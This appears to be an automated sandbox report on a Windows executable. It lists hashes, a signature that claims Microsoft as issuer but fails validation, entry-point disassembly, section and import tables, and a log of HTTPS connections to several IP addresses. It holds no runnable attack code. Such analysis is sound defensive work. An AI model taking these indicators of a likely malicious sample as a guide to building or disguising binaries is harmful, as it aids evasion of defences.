                    SHA256:6e4422d8d101bf53165220c1fce47839b23a41057420d070fb909979415553f8
                    SHA512:1d5debda8b3a48c66845692fffb5fbcc9224e48fca6dc549661b1d583d88706660894fc380fc731c00c82c0bc276ee9f68cf00fab6613f510fbc3e837012f3cd
                    SSDEEP:49152:tI/0Xh92X3FAOkoQgcK11eVBOHpwIf0bOtW1sLjS5gd:WO2X33DVp98bObLwK
                    TLSH:1EB5BF15D3E802A5E47BC630CA699733C7B1B85A2734D68B0659D6862FB3ED14B3F312
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...dm.Kdm.Kdm.K...Jmm.K...Jhm.K...JJm.Km.*Kjm.K/..Jmm.Kdm.K.m.K...Jom.K...J m.Kdm.Kem.Kw..Jem.Kw.FKem.Kw..Jem.K...............
                    Icon Hash:00928e8e8686b000
                    Entrypoint:0x140068f38
                    Entrypoint Section:.text
                    Digitally signed:true
                    Imagebase:0x140000000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66C0B63E [Sat Aug 17 14:39:58 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:9e02808def02e999c496dcaa4fcfd6ba
                    Signature Valid:false
                    Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                    Error Number:-2146762487
                    Not Before, Not After
                    • 19/08/2024 11:12:56 19/08/2025 11:12:56
                    Subject Chain
                    • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                    Version:3
                    Thumbprint MD5:DA207C3C0265007E4608E443B592097F
                    Thumbprint SHA-1:D25327B22C51D559A9831549AD7DED5720CBBFF4
                    Thumbprint SHA-256:FA3C112FFC2A6252F825D426B4F66D7CAA58828660ABFF304320D7C0B53C908A
                    Serial:00968F27650BEB8FEA06105C962F8ED5FF
                    Instruction
                    dec eax
                    sub esp, 28h
                    call 00007EFFD8845550h
                    dec eax
                    add esp, 28h
                    jmp 00007EFFD8844D27h
                    int3
                    int3
                    inc eax
                    push ebx
                    dec eax
                    sub esp, 20h
                    dec eax
                    mov ebx, ecx
                    jmp 00007EFFD8844EC1h
                    dec eax
                    mov ecx, ebx
                    call 00007EFFD884C6A9h
                    test eax, eax
                    je 00007EFFD8844EC5h
                    dec eax
                    mov ecx, ebx
                    call 00007EFFD8844BD9h
                    dec eax
                    test eax, eax
                    je 00007EFFD8844E99h
                    dec eax
                    add esp, 20h
                    pop ebx
                    ret
                    dec eax
                    cmp ebx, FFFFFFFFh
                    je 00007EFFD8844EB8h
                    call 00007EFFD88459E0h
                    int3
                    call 00007EFFD88459FAh
                    int3
                    jmp 00007EFFD8845A28h
                    int3
                    int3
                    int3
                    jmp 00007EFFD8844F70h
                    int3
                    int3
                    int3
                    dec eax
                    sub esp, 28h
                    dec ebp
                    mov eax, dword ptr [ecx+38h]
                    dec eax
                    mov ecx, edx
                    dec ecx
                    mov edx, ecx
                    call 00007EFFD8844EC2h
                    mov eax, 00000001h
                    dec eax
                    add esp, 28h
                    ret
                    int3
                    int3
                    int3
                    inc eax
                    push ebx
                    inc ebp
                    mov ebx, dword ptr [eax]
                    dec eax
                    mov ebx, edx
                    inc ecx
                    and ebx, FFFFFFF8h
                    dec esp
                    mov ecx, ecx
                    inc ecx
                    test byte ptr [eax], 00000004h
                    dec esp
                    mov edx, ecx
                    je 00007EFFD8844EC5h
                    inc ecx
                    mov eax, dword ptr [eax+08h]
                    dec ebp
                    arpl word ptr [eax+04h], dx
                    neg eax
                    dec esp
                    add edx, ecx
                    dec eax
                    arpl ax, cx
                    dec esp
                    and edx, ecx
                    dec ecx
                    arpl bx, ax
                    dec edx
                    mov edx, dword ptr [eax+edx]
                    dec eax
                    mov eax, dword ptr [ebx+10h]
                    mov ecx, dword ptr [eax+08h]
                    dec eax
                    mov eax, dword ptr [ebx+08h]
                    test byte ptr [ecx+eax+03h], 0000000Fh
                    je 00007EFFD8844EBDh
                    movzx eax, byte ptr [ecx+eax+00h]
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x2758c00x58.rdata
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2759180xdc.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x29c0000x30d8.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2870000x14184.pdata
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x2296000x1e60.rdata
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a00000x644.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x245b500x54.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x245d800x28.rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x245a100x140.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x1a70000x720.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x711180x71200221be7d0d5e39d3111e3d0b536f5c1b1False0.45581837016574583data6.6344996472311655IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .managed0x730000xcdcb80xcde00f2c67f30e7bd4b40e8e8b5cdbc8f569dFalse0.4515252637370977data6.4553137792934425IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    hydrated0x1410000x654a80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rdata0x1a70000xd02e80xd04007fe464085761d81d9536a63863244125False0.46597740658763503data6.845918928994816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x2780000xef600x2200c83211c0218d8881d0c007763f391523False0.24597886029411764data3.7951751618344374IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .pdata0x2870000x141840x14200a5f56b90e4030d137ca80e06e1a867efFalse0.48904551630434784data6.174251542452601IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc0x29c0000x30d80x3200a04f95fd005e5672b1d099ece726e0a4False0.9215625data7.816666284493657IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x2a00000x6440x8006821114138d3e1df6a6164ef24df1791False0.43798828125data4.683627888014547IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    BINARY0x29c1340x2aa4data1.00100769512642
                    RT_VERSION0x29ebd80x314data0.39847715736040606
                    RT_MANIFEST0x29eeec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                    DLLImport
                    ADVAPI32.dllRegCloseKey, RegEnumValueW, RegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegDeleteKeyExW, RegDeleteValueW, RegEnumKeyExW, RegFlushKey, RegQueryInfoKeyW, RegSetValueExW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, CreateWellKnownSid, GetWindowsAccountDomainSid, RevertToSelf, OpenThreadToken, SetThreadToken, DuplicateTokenEx, GetSecurityDescriptorLength, EventWrite, EventRegister, EventEnabled
                    bcrypt.dllBCryptDestroyKey, BCryptGenerateSymmetricKey, BCryptOpenAlgorithmProvider, BCryptGenRandom, BCryptCloseAlgorithmProvider
                    KERNEL32.dllTlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, CloseThreadpoolIo, GetCurrentProcessId, MultiByteToWideChar, GetStdHandle, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, FindStringOrdinal, GetTickCount64, GetCurrentProcess, GetCurrentThread, Sleep, InitializeCriticalSection, InitializeConditionVariable, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, WaitForMultipleObjectsEx, GetLastError, QueryPerformanceFrequency, SetLastError, GetFullPathNameW, GetLongPathNameW, LocalAlloc, GetConsoleOutputCP, WideCharToMultiByte, GetProcAddress, RaiseFailFastException, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CreateFileW, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, WriteFile, GetCurrentProcessorNumberEx, CloseHandle, SetEvent, ResetEvent, CreateEventExW, GetEnvironmentVariableW, FormatMessageW, DuplicateHandle, GetThreadPriority, SetThreadPriority, GetConsoleWindow, FreeConsole, AllocConsole, CreateProcessW, GetThreadContext, ExitProcess, K32EnumProcessModulesEx, IsWow64Process, GetExitCodeProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, FlushProcessWriteBuffers, GetCurrentThreadId, WaitForSingleObjectEx, VirtualQuery, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, TerminateProcess, SwitchToThread, CreateThread, SuspendThread, ResumeThread, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, InitializeSListHead
                    ole32.dllCoGetApartmentType, CoUninitialize, CoInitializeEx, CoCreateGuid, CoWaitForMultipleHandles
                    api-ms-win-crt-math-l1-1-0.dllceil, __setusermatherr
                    api-ms-win-crt-heap-l1-1-0.dllfree, _callnewh, calloc, _set_new_mode, malloc
                    api-ms-win-crt-string-l1-1-0.dll_stricmp, strcpy_s, strcmp, _wcsicmp, wcsncmp, strncpy_s
                    api-ms-win-crt-runtime-l1-1-0.dll__p___wargv, _cexit, exit, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, __p___argc, _exit, abort, _initterm_e, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _set_app_type, _initterm, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment
                    api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsprintf_s, __stdio_common_vfprintf, __p__commode, _set_fmode, __stdio_common_vsscanf, __acrt_iob_func
                    api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 16, 2024 21:20:03.304239988 CEST49674443192.168.2.6173.222.162.64
                    Sep 16, 2024 21:20:03.304239988 CEST49673443192.168.2.6173.222.162.64
                    Sep 16, 2024 21:20:03.632356882 CEST49672443192.168.2.6173.222.162.64
                    Sep 16, 2024 21:20:09.548367977 CEST49713443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:09.548396111 CEST44349713104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:09.548460007 CEST49713443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:09.560796976 CEST49713443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:09.560813904 CEST44349713104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:10.026403904 CEST44349713104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:10.030174017 CEST49713443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:10.032916069 CEST49713443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:10.032937050 CEST44349713104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:10.033348083 CEST44349713104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:10.080871105 CEST49713443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:10.103212118 CEST49713443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:10.147403002 CEST44349713104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:10.210706949 CEST44349713104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:10.210832119 CEST44349713104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:10.210871935 CEST44349713104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:10.210951090 CEST44349713104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:10.211007118 CEST49713443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:10.211023092 CEST44349713104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:10.211096048 CEST44349713104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:10.212325096 CEST49713443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:10.243455887 CEST49713443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:10.670444965 CEST49716443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:10.670488119 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:10.670566082 CEST49716443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:10.670928955 CEST49716443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:10.670938969 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.144308090 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.148144960 CEST49716443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:11.149579048 CEST49716443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:11.149589062 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.149983883 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.151315928 CEST49716443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:11.195400000 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.615710020 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.615755081 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.615787983 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.615870953 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.615906954 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.615931988 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.616031885 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.623402119 CEST44349716188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:11.627758026 CEST49716443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:11.633960009 CEST49716443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:12.922230959 CEST49673443192.168.2.6173.222.162.64
                    Sep 16, 2024 21:20:12.980591059 CEST49674443192.168.2.6173.222.162.64
                    Sep 16, 2024 21:20:13.281456947 CEST49672443192.168.2.6173.222.162.64
                    Sep 16, 2024 21:20:15.325397015 CEST44349707173.222.162.64192.168.2.6
                    Sep 16, 2024 21:20:15.325794935 CEST49707443192.168.2.6173.222.162.64
                    Sep 16, 2024 21:20:15.643717051 CEST49719443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:15.643765926 CEST44349719104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:15.643868923 CEST49719443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:15.644100904 CEST49719443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:15.644114017 CEST44349719104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:16.307094097 CEST44349719104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:16.308583975 CEST49719443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:16.308614016 CEST44349719104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:16.429352045 CEST44349719104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:16.429393053 CEST44349719104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:16.429533958 CEST49719443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:16.429555893 CEST44349719104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:16.434161901 CEST44349719104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:16.434259892 CEST44349719104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:16.434267044 CEST49719443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:16.434329033 CEST49719443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:16.434637070 CEST49719443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:16.502985001 CEST49722443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:16.503078938 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:16.503176928 CEST49722443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:16.503422976 CEST49722443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:16.503456116 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:17.862747908 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:17.864034891 CEST49722443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:17.864099026 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:18.407274008 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:18.407310009 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:18.407541990 CEST49722443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:18.407622099 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:18.408799887 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:18.408868074 CEST49722443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:18.408885002 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:18.412178993 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:18.412197113 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:18.412234068 CEST49722443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:18.412251949 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:18.412286997 CEST44349722188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:18.412626028 CEST49722443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:18.412626028 CEST49722443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:21.612185001 CEST49723443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:21.612247944 CEST44349723104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:21.620429993 CEST49723443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:21.620701075 CEST49723443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:21.620721102 CEST44349723104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:22.081242085 CEST44349723104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:22.082859039 CEST49723443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:22.082882881 CEST44349723104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:22.218628883 CEST44349723104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:22.218663931 CEST44349723104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:22.218832970 CEST49723443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:22.218862057 CEST44349723104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:22.220230103 CEST44349723104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:22.220316887 CEST44349723104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:22.220346928 CEST49723443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:22.220501900 CEST49723443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:22.220890999 CEST49723443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:22.271224976 CEST49724443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:22.271270037 CEST44349724188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:22.271400928 CEST49724443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:22.271600008 CEST49724443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:22.271615028 CEST44349724188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:22.750114918 CEST44349724188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:22.785280943 CEST49724443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:22.785296917 CEST44349724188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:22.985330105 CEST44349724188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:22.986373901 CEST44349724188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:22.986464024 CEST44349724188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:22.988176107 CEST44349724188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:22.988214016 CEST44349724188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:22.989919901 CEST44349724188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:22.990031958 CEST44349724188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:22.990302086 CEST49724443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:22.991157055 CEST49724443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:22.991530895 CEST49724443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:27.383451939 CEST49729443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:27.383550882 CEST44349729104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:27.383666992 CEST49729443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:27.384076118 CEST49729443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:27.384110928 CEST44349729104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:27.988682985 CEST44349729104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:28.002747059 CEST49729443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:28.002819061 CEST44349729104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:28.126045942 CEST44349729104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:28.126560926 CEST44349729104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:28.126588106 CEST44349729104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:28.126610041 CEST44349729104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:28.126648903 CEST49729443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:28.126708031 CEST44349729104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:28.126735926 CEST44349729104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:28.126739979 CEST49729443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:28.126787901 CEST49729443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:28.127563000 CEST49729443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:28.405404091 CEST49730443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:28.405483007 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:28.405575991 CEST49730443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:28.406282902 CEST49730443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:28.406300068 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:28.870647907 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:28.883280993 CEST49730443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:28.883323908 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:29.091238022 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:29.091272116 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:29.091329098 CEST49730443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:29.091363907 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:29.091955900 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:29.092010021 CEST49730443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:29.092021942 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:29.092777014 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:29.092798948 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:29.092828989 CEST49730443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:29.092838049 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:29.092870951 CEST44349730188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:29.092878103 CEST49730443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:29.092916965 CEST49730443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:29.093519926 CEST49730443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:33.422610044 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:33.422636986 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:33.422715902 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:33.423053026 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:33.423064947 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:33.905535936 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:33.905627966 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:33.907494068 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:33.907504082 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:33.907763958 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:33.909074068 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:33.951414108 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.032653093 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.033021927 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.033083916 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:34.033097982 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.034280062 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.034322023 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.034337044 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:34.034346104 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.034406900 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:34.035132885 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.035932064 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.035962105 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.036005020 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:34.036015034 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.036058903 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:34.037461042 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.084599018 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:34.084613085 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.123800993 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.123835087 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.123934031 CEST44349732104.21.76.57192.168.2.6
                    Sep 16, 2024 21:20:34.124054909 CEST49732443192.168.2.6104.21.76.57
